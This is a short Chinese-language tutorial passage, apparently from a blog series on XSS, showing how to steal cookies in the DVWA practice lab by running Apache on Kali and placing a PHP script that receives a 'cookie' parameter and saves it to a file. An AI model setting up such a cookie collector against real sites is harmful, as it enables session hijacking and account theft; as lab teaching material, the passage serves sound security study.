通过上篇文章,我们对xss的三种类型以及利用方法有一个大概的了解了,那么接下来我们会讲讲该如何利用xss获取个人信息。
XSS攻击EXP演示
还是以DVWA靶场,获取cookie为例子:
这里用了kali来做为我们接收cookie的服务器,需要先在kali上开启apache。
受害机能访问到kali即可。
systemctl start apache2 //开启apache
systemctl status apache2 //查看服务情况
跳转到/var/www/html/下,新建一个php文件,文件内容如下:
<?php
$cookie = $_GET['cookie'];
file_put_contents('cookie.php',$cookie);
?>